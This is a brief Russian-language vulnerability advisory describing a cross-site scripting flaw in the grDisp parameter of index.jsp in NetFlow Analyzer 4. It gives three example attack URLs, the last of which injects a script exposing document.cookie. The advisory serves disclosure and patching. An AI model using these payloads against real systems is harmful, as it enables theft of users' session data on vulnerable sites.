Программа: NetFlow Analyzer 4

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
получить доступ к потенциально важным
данным других пользователей.

Уязвимость существует при обработке
входных данных grDisp в сценарии index.jsp.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.

Примеры:

http://victim/netflow/jspui/index.jsp?grID=-1 &view=groups&grDisp=<h1>test</h1>
http://victim/netflow/jspui/index.jsp?grID=-1 &view=groups&grDisp=<script>alert("test")</script>
http://victim/netflow/jspui/index.jsp?grID=-1 &view=groups&grDisp=<script>alert(document.cookie)</script>



Оставить мнение